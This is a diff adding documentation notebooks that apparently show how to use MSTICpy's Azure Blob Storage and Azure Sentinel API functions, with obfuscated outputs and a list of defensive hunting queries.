+    "    source_columns=['UserId', 'Computer']\n",
+    ")"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.8.0"
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/AzureBlobStorage.ipynb b/docs/notebooks/AzureBlobStorage.ipynb
new file mode 100644
index 000000000..d8e15e8ad
--- /dev/null
+++ b/docs/notebooks/AzureBlobStorage.ipynb
@@ -0,0 +1,503 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Azure Blob Service Functions\n",
+    "\n",
+    "MSTICpy versions > 0.8.9\n",
+    "\n",
+    "### Description\n",
+    "\n",
+    "This Notebook provides an example of using the Azure Blob Storage features of MSTICpy in order interact with an Azure Blob Storage account.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[azure]\n",
+    "```\n",
+    "\n",
+    "### Installation and imports"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.data.azure_blob_storage import AzureBlobStorage\n",
+    "from msticpy.data import data_obfus as mask"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The first step is to initalize the AzureBlobStorage client. Each client is specific to a seperate Azure Blob Storage account and you must pass it the account name when initalizing the client. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "abs = AzureBlobStorage(abs_name=\"abscontainer\")\n",
+    "abs.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The first step when working with Azure Blob Storage is identifying the container to store blobs in, we can enumerate all the containers in the account with `.containers()`. Note that only containers you have permissons to access will be shown, the Azure Blob Storage features of MSTICpy use the same authentication methods as other Azure service elements and you can specific `auth_methods` when calling `.connect` to select the required authentication method."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Attempting to sign-in with environment variable credentials...\n",
+      "obfuscating columns:\n",
+      "name, etag, \n",
+      "done\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>name</th>\n",
+       "      <th>last_modified</th>\n",
+       "      <th>etag</th>\n",
+       "      <th>public_access</th>\n",
+       "      <th>has_immutability_policy</th>\n",
+       "      <th>deleted</th>\n",
+       "      <th>version</th>\n",
+       "      <th>has_legal_hold</th>\n",
+       "      <th>metadata</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>bikjdaerb</td>\n",
+       "      <td>2020-11-06 21:53:33+00:00</td>\n",
+       "      <td>rbjkmanljijmqpqmpjc</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>epfdkmlmqkmqb</td>\n",
+       "      <td>2020-11-19 15:22:38+00:00</td>\n",
+       "      <td>ooidklonjqooimbjkpb</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            name             last_modified                 etag public_access  \\\n",
+       "0      bikjdaerb 2020-11-06 21:53:33+00:00  rbjkmanljijmqpqmpjc          None   \n",
+       "1  epfdkmlmqkmqb 2020-11-19 15:22:38+00:00  ooidklonjqooimbjkpb          None   \n",
+       "\n",
+       "   has_immutability_policy deleted version  has_legal_hold metadata  \n",
+       "0                    False    None    None           False     None  \n",
+       "1                    False    None    None           False     None  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "containers = abs.containers()\n",
+    "display(containers.mp_obf.obfuscate(column_map={\"etag\": \"str\", \"name\":\"str\"}))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also create new containers with `.create_container()`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>name</th>\n",
+       "      <th>last_modified</th>\n",
+       "      <th>etag</th>\n",
+       "      <th>public_access</th>\n",
+       "      <th>has_immutability_policy</th>\n",
+       "      <th>deleted</th>\n",
+       "      <th>version</th>\n",
+       "      <th>has_legal_hold</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>documenationcontainer</td>\n",
+       "      <td>2020-11-24 17:40:53+00:00</td>\n",
+       "      <td>\"0x8D890A0179F6EAA\"</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                    name             last_modified                 etag  \\\n",
+       "0  documenationcontainer 2020-11-24 17:40:53+00:00  \"0x8D890A0179F6EAA\"   \n",
+       "\n",
+       "  public_access  has_immutability_policy deleted version  has_legal_hold  \n",
+       "0          None                    False    None    None           False  "
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "abs.create_container(container_name=\"documenationcontainer\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once we have a container we can write blobs to the container. Blob objects can be of any type but here we are passing a simple string."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Upload complete\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 22,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "abs.upload_to_blob(blob=\"Here is some test data\", container_name=\"documenationcontainer\", blob_name=\"test-blob\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can list blobs within a container in the same way we listed containers, here you can see the blob we just created."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>name</th>\n",
+       "      <th>container</th>\n",
+       "      <th>snapshot</th>\n",
+       "      <th>version_id</th>\n",
+       "      <th>is_current_version</th>\n",
+       "      <th>blob_type</th>\n",
+       "      <th>encrypted_metadata</th>\n",
+       "      <th>last_modified</th>\n",
+       "      <th>etag</th>\n",
+       "      <th>size</th>\n",
+       "      <th>...</th>\n",
+       "      <th>remaining_retention_days</th>\n",
+       "      <th>creation_time</th>\n",
+       "      <th>archive_status</th>\n",
+       "      <th>encryption_key_sha256</th>\n",
+       "      <th>encryption_scope</th>\n",
+       "      <th>request_server_encrypted</th>\n",
+       "      <th>object_replication_source_properties</th>\n",
+       "      <th>object_replication_destination_policy</th>\n",
+       "      <th>tag_count</th>\n",
+       "      <th>tags</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>test-blob</td>\n",
+       "      <td>documenationcontainer</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>BlobType.BlockBlob</td>\n",
+       "      <td>None</td>\n",
+       "      <td>2020-11-24 17:47:41+00:00</td>\n",
+       "      <td>0x8D890A10A6DC6A3</td>\n",
+       "      <td>22</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>2020-11-24 17:47:41+00:00</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>1 rows × 34 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "        name              container snapshot version_id is_current_version  \\\n",
+       "0  test-blob  documenationcontainer     None       None               None   \n",
+       "\n",
+       "            blob_type encrypted_metadata             last_modified  \\\n",
+       "0  BlobType.BlockBlob               None 2020-11-24 17:47:41+00:00   \n",
+       "\n",
+       "                etag  size  ... remaining_retention_days  \\\n",
+       "0  0x8D890A10A6DC6A3    22  ...                     None   \n",
+       "\n",
+       "              creation_time archive_status encryption_key_sha256  \\\n",
+       "0 2020-11-24 17:47:41+00:00           None                  None   \n",
+       "\n",
+       "   encryption_scope request_server_encrypted  \\\n",
+       "0              None                     None   \n",
+       "\n",
+       "  object_replication_source_properties object_replication_destination_policy  \\\n",
+       "0                                   []                                  None   \n",
+       "\n",
+       "  tag_count  tags  \n",
+       "0      None  None  \n",
+       "\n",
+       "[1 rows x 34 columns]"
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "abs.blobs(container_name=\"documenationcontainer\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also return the contents of a blob like so:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "b'Here is some test data'"
+      ]
+     },
+     "execution_count": 24,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "abs.get_blob(container_name=\"documenationcontainer\", blob_name=\"test-blob\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "When sharing blobs its often necessary to access a SAS token that allow a user to access a specific blob for a specific amount of time, without having to have explicity permissions on the Azure Blob Storage account.\n",
+    "In the example below we obsfucate the retruned SAS token but it will take the form of a full URL to the blob, with the required SAS token appeneded. By default tokens generated allow access for 7 days but this can be adjusted."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'irrjnoieonelkirmqkerfibemcjbclillbjcncpiooqjklelmqebrambdkjaaqpqirrjnoieonelkirmqkerfibemcjbclillbjcncpiooqjklelmqebrambdkjaaqpqirrjnoieonelkirmqkerfibemcjbclillbjcncpiooqjklelmqebrambdkjaaqpqirrjnoieonelkirmqkerfibemcjbclillbjcncpiooqjklelmqebrambdkjaaqpqirrjnoieonelkirmqkerfibemcjbclillbjcncpiooqjklelmqebrambdkjaaqpq'"
+      ]
+     },
+     "execution_count": 26,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "sast = abs.get_sas_token(container_name=\"documenationcontainer\", blob_name=\"test-blob\")\n",
+    "mask.hash_string(sast)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Finally we can delete a blob, below we delete the blob we just created and then list all blobs in the container, which returns nothing as it is now empty:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "abs.delete_blob(container_name=\"documenationcontainer\", blob_name=\"test-blob\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "abs.blobs(container_name=\"documenationcontainer\")"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/AzureSentinelAPIs.ipynb b/docs/notebooks/AzureSentinelAPIs.ipynb
new file mode 100644
index 000000000..0f71a01d0
--- /dev/null
+++ b/docs/notebooks/AzureSentinelAPIs.ipynb
@@ -0,0 +1,1882 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#Azure-Sentinel-API-Calls\" data-toc-modified-id=\"Azure-Sentinel-API-Calls-1\">Azure Sentinel API Calls</a></span><ul class=\"toc-item\"><li><ul class=\"toc-item\"><li><span><a href=\"#Description\" data-toc-modified-id=\"Description-1.0.1\">Description</a></span></li><li><span><a href=\"#Installation-and-imports\" data-toc-modified-id=\"Installation-and-imports-1.0.2\">Installation and imports</a></span></li><li><span><a href=\"#Authentication\" data-toc-modified-id=\"Authentication-1.0.3\">Authentication</a></span></li></ul></li></ul></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Azure Sentinel API Calls\n",
+    "\n",
+    "MSTICpy versions > 0.8.5\n",
+    "\n",
+    "### Description\n",
+    "\n",
+    "This Notebook provides an example of using the Azure Sentinel API features of MSTICpy in order retrieve specific data from Azure Sentinel\n",
+    "\n",
+    "### Installation and imports"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "%pip install --upgrade msticpy[azsentinel]"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T00:46:14.769939Z",
+     "start_time": "2020-10-28T00:46:12.006888Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "from msticpy.data.azure_sentinel import AzureSentinel\n",
+    "import msticpy.nbtools.nbwidgets as widgets\n",
+    "from msticpy.data import data_obfus as mask"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "The first step to be able to use the features is to call the AzureSentinel class and connect to it. Authentication uses the standardized Azure authentication options of using environment variables, Azure CLI credentials, Managed Identities, and interactive logons."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T00:46:21.283503Z",
+     "start_time": "2020-10-28T00:46:16.357954Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Attempting to sign-in with environment variable credentials...\n"
+     ]
+    }
+   ],
+   "source": [
+    "azs = AzureSentinel()\n",
+    "azs.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once connected we need to select an Azure Sentinel workspace to get details from. The easies way to do this is with the get_subscriptions() and get_sentinel_workspaces() functions to select the subscription and workspace you with to connect to. If you already know which workspace you wish to connect to you can skip straight to the other functions and enter these details."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T01:39:48.623598Z",
+     "start_time": "2020-10-28T01:39:48.258598Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Attempting to sign-in with environment variable credentials...\n",
+      "obfuscating columns:\n",
+      "Display Name, \n",
+      "done\n",
+      "Select a subscription:\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "830b967ed650424692fa54a55234a9a9",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Query for our subscriptions\n",
+    "subs = azs.get_subscriptions()\n",
+    "subs = subs.mp_obf.obfuscate(column_map={\"Display Name\": \"str\"})\n",
+    "\n",
+    "# Display subscriptions (masked names) in a pick list\n",
+    "print(\"Select a subscription:\")\n",
+    "sub = widgets.SelectItem(\n",
+    "    item_list=subs['Display Name'].to_list(),\n",
+    "    auto_display=True\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T01:44:53.170848Z",
+     "start_time": "2020-10-28T01:44:47.548676Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Finding Azure Sentinel Workspaces...\n",
+      "Attempting to sign-in with environment variable credentials...\n",
+      "Select an Azure Sentinel Workspace:\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "c24a0d08d4614340907a64b1039eadf6",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Get the subscription ID\n",
+    "sub_id = subs[subs['Display Name'] == sub.value].iloc[0]['Subscription ID']\n",
+    "# Query for workspaces in that subscription\n",
+    "workspaces = azs.get_sentinel_workspaces(sub_id = sub_id)\n",
+    "# Display workspaces in a list\n",
+    "print(\"Select an Azure Sentinel Workspace:\")\n",
+    "ws = widgets.SelectItem(\n",
+    "    item_dict=workspaces,\n",
+    "    auto_display=True\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Now that we have selected our workspace we can call various functions to get details about content in the workspace. These are typically returned as DataFrames. Below we get a list of hunting queries configured in our workspace."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T01:45:10.962506Z",
+     "start_time": "2020-10-28T01:45:09.792474Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>type</th>\n",
+       "      <th>properties.Category</th>\n",
+       "      <th>properties.DisplayName</th>\n",
+       "      <th>properties.Query</th>\n",
+       "      <th>properties.Version</th>\n",
+       "      <th>properties.Tags</th>\n",
+       "      <th>properties.FunctionAlias</th>\n",
+       "      <th>properties.FunctionParameters</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>Microsoft.OperationalInsights/savedSearches</td>\n",
+       "      <td>Hunting Queries</td>\n",
+       "      <td>Powershell</td>\n",
+       "      <td>SecurityEvent\\r\\n| where ParentProcessName con...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>Microsoft.OperationalInsights/savedSearches</td>\n",
+       "      <td>Hunting Queries</td>\n",
+       "      <td>Anomalous AAD Account Creation</td>\n",
+       "      <td>\\nBehaviorAnalytics\\n| where ActionType == \"Ad...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[{'Name': 'description', 'Value': ''}, {'Name'...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>Microsoft.OperationalInsights/savedSearches</td>\n",
+       "      <td>Hunting Queries</td>\n",
+       "      <td>Entropy for Processes for a given Host</td>\n",
+       "      <td>\\n// May need to reduce the number of days if ...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[{'Name': 'description', 'Value': ''}, {'Name'...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>Microsoft.OperationalInsights/savedSearches</td>\n",
+       "      <td>Hunting Queries</td>\n",
+       "      <td>RareDNSLookupWithDataTransfer</td>\n",
+       "      <td>\\nlet lookbackint = 7;\\nlet lookupThreshold = ...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[{'Name': 'description', 'Value': ''}, {'Name'...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>Microsoft.OperationalInsights/savedSearches</td>\n",
+       "      <td>Hunting Queries</td>\n",
+       "      <td>Least Common Processes by Command Line</td>\n",
+       "      <td>\\nlet Allowlist = dynamic (['foo.exe', 'baz.ex...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>[{'Name': 'description', 'Value': ''}, {'Name'...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                           type properties.Category  \\\n",
+       "2   Microsoft.OperationalInsights/savedSearches     Hunting Queries   \n",
+       "5   Microsoft.OperationalInsights/savedSearches     Hunting Queries   \n",
+       "7   Microsoft.OperationalInsights/savedSearches     Hunting Queries   \n",
+       "9   Microsoft.OperationalInsights/savedSearches     Hunting Queries   \n",
+       "12  Microsoft.OperationalInsights/savedSearches     Hunting Queries   \n",
+       "\n",
+       "                    properties.DisplayName  \\\n",
+       "2                               Powershell   \n",
+       "5           Anomalous AAD Account Creation   \n",
+       "7   Entropy for Processes for a given Host   \n",
+       "9            RareDNSLookupWithDataTransfer   \n",
+       "12  Least Common Processes by Command Line   \n",
+       "\n",
+       "                                     properties.Query  properties.Version  \\\n",
+       "2   SecurityEvent\\r\\n| where ParentProcessName con...                   2   \n",
+       "5   \\nBehaviorAnalytics\\n| where ActionType == \"Ad...                   2   \n",
+       "7   \\n// May need to reduce the number of days if ...                   2   \n",
+       "9   \\nlet lookbackint = 7;\\nlet lookupThreshold = ...                   2   \n",
+       "12  \\nlet Allowlist = dynamic (['foo.exe', 'baz.ex...                   2   \n",
+       "\n",
+       "                                      properties.Tags  \\\n",
+       "2                                                 NaN   \n",
+       "5   [{'Name': 'description', 'Value': ''}, {'Name'...   \n",
+       "7   [{'Name': 'description', 'Value': ''}, {'Name'...   \n",
+       "9   [{'Name': 'description', 'Value': ''}, {'Name'...   \n",
+       "12  [{'Name': 'description', 'Value': ''}, {'Name'...   \n",
+       "\n",
+       "   properties.FunctionAlias properties.FunctionParameters  \n",
+       "2                       NaN                           NaN  \n",
+       "5                       NaN                           NaN  \n",
+       "7                       NaN                           NaN  \n",
+       "9                       NaN                           NaN  \n",
+       "12                      NaN                           NaN  "
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "queries = azs.get_hunting_queries(ws.value)\n",
+    "queries.head().drop(columns=[\"id\", \"etag\", \"name\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Hunting queries return the raw queries associated with them, this allows us to pass the query directly to a QueryProvider in order to get the results of the hunting query within the notebook."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-28T00:52:19.961283Z",
+     "start_time": "2020-10-28T00:52:16.730666Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>Weight</th>\n",
+       "      <th>AdjustedProcessEntropy</th>\n",
+       "      <th>FullDecimalProcessEntropy</th>\n",
+       "      <th>Process</th>\n",
+       "      <th>NewProcessName</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ParentProcessName</th>\n",
+       "      <th>TotalProcessCountOnHost</th>\n",
+       "      <th>ProcessCountOnHost</th>\n",
+       "      <th>DistinctComputersWithProcessCount</th>\n",
+       "      <th>timestamp</th>\n",
+       "      <th>HostCustomEntity</th>\n",
+       "      <th>AccountCustomEntity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2020-11-21 21:18:51.317000+00:00</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>WinAttackSim</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>WORKGROUP\\WinAttackSim$</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>10.743361</td>\n",
+       "      <td>0.001074</td>\n",
